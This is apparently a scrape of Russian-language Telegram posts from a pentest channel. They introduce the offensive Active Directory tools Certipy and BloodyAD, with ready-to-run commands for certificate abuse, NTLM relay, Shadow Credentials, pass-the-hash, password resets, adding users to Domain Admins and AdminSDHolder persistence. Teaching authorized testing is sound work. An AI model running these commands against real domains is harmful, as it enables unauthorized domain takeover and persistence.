Введение в прохождение Active Directory заданий на codeby games
Добрый вечер, друзья!
В первой части разберем базовые моменты при решение задач Active Directory:
- Разведка
- Основные службы
- Утилиты
- Подключение
📌 Читать статью
#activedirectory
Добрый вечер, друзья!
В первой части разберем базовые моменты при решение задач Active Directory:
- Разведка
- Основные службы
- Утилиты
- Подключение
📌 Читать статью
#activedirectory
🔥22🎉8👍6🏆5😁1
Certipy: Инструмент для аудита и эксплуатации служб сертификации Active Directory
🎇 Certipy предназначен как для наступательных, так и для защитных задач, связанных с Active Directory Certificate Services. Инструмент обеспечивает комплексный подход к оценке безопасности PKI-инфраструктуры Windows. Функции:
▶️ поиск центров сертификации (CA) и шаблонов сертификатов
▶️ автоматическое выявление misconfigurations (ESC1–ESC16)
▶️ создание сертификатов с заданными атрибутами
▶️ использование сертификатов для получения доступа
▶️ перехват и перенаправление NTLM-аутентификации на HTTP(S)/RPC-эндпоинты AD CS
⬇️ Установка
Проверка
⏺️ Перечисление AD CS (find)
⏺️ Сохранение результатов (флаг -output)
⏺️ Поиск уязвимостей (флаг -vulnerable)
⏺️ Запрос сертификата (req)
⏺️ Аутентификация по сертификату (auth)
⏺️ Управление сертификатами (cert)
⏺️ Shadow Credentials атака (shadow)
⏺️ Ретрансляция NTLM (relay)
⏺️ Справка по конкретной команде
👉 Ограничения
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)
#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Certipy — инструмент для перечисления, анализа и эксплуатации уязвимостей служб сертификации Active Directory (AD CS). Разработан для профессионального тестирования на проникновение и защиты инфраструктур, поддерживает полный спектр известных атак (ESC1–ESC16) и предоставляет возможности для обнаружения, запроса, подделки сертификатов и ретрансляции аутентификации.
pipx install certipy-ad
Проверка
certipy-ad -h
certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10
certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -output results
certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -vulnerable
certipy-ad req -u user@domain.local -p 'Password123!' -ca 'CA-SERVER' -template 'User'
certipy-ad auth -pfx user.pfx -dc-ip 192.168.1.10
certipy-ad cert -pfx user.pfx -password 'Password123!' -export
certipy-ad shadow -u user@domain.local -p 'Password123!' -target 'computer$' -dc-ip 192.168.1.10
certipy-ad relay -ca 192.168.1.10 -template 'DomainController'
certipy-ad find -h
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)
#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍8❤6
BloodyAD: Фреймворк для повышения привилегий в Active Directory
👉 BloodyAD предоставляет возможность выполнять привилегированные операции через LDAP-протокол. Инструмент отличается следующими характеристиками:
▶️ множество методов аутентификации (NTLM (пароль/хеш), Kerberos, сертификаты (Schannel, PKINIT))
▶️ прозрачная работа через SOCKS-прокси
▶️ поддержка LDAPS и шифрования
▶️ интеграция с DNS-функциями Active Directory
▶️ гибкая система команд для управления объектами AD
⬇️ Установка
Проверка
⏺️ Аутентификация с паролем (NTLM)
⏺️ Pass-the-Hash аутентификация
⏺️ Смена пароля пользователя
⏺️ Получение информации о пользователе
⏺️ Добавление пользователя в группу
⏺️ Удаление пользователя из группы
⏺️ Shadow Credentials (атака на основе сертификатов)
⏺️ Изменение атрибутов безопасности
⏺️ Поиск объектов с заданными атрибутами
⏺️ Получение всех пользователей с непередаваемыми учетными записями
🎇 Ограничения и требования
- Для выполнения привилегированных операций требуются соответствующие права в AD
- Необходим доступ к портам LDAP (389/636) и, при необходимости, к Kerberos (88)
- Поддерживаются современные версии Python 3
- Кроссплатформенный инструмент (Windows, Linux, macOS)
#ActiveDirectory #AD #LDAP #BloodyAD #tool #pentest
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
BloodyAD — инструмент, выполняющий специализированные LDAP-запросы к контроллеру домена. Поддерживает аутентификацию с использованием паролей в открытом виде, Pass-the-Hash, Pass-the-Ticket и сертификатов, обеспечивая гибкие возможности для тестирования безопасности AD-инфраструктур.
pipx install bloodyad
Проверка
bloodyad -h
bloodyAD --host 192.168.1.10 -d bloody.local -u john.doe -p 'Password123!' get object user john.doe
bloodyAD --host dc01.corp.local -d corp.local -u administrator -p :70016778cb0524c799ac25b439bd6a31 get group "Domain Admins"
bloodyAD --host 172.16.1.15 -d bloody.local -u admin -p 'Admin123!' set password john.doe 'NewP@ssw0rd!'
bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get object user administrator --json
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add groupmember "Domain Admins" john.doe
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' remove groupmember "Domain Admins" john.doe
#добавление теневых учетных данных для пользователя
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add shadowCredentials john.doe
#получение хеша из теневых учетных данных
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' get shadowCredentials john.doe
#добавление GenericAll права для пользователя на объект
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' set genericall john.doe "CN=AdminSDHolder,CN=System,DC=corp,DC=local"
bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(&(objectClass=user)(adminCount=1))"
bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
- Для выполнения привилегированных операций требуются соответствующие права в AD
- Необходим доступ к портам LDAP (389/636) и, при необходимости, к Kerberos (88)
- Поддерживаются современные версии Python 3
- Кроссплатформенный инструмент (Windows, Linux, macOS)
#ActiveDirectory #AD #LDAP #BloodyAD #tool #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤6🔥6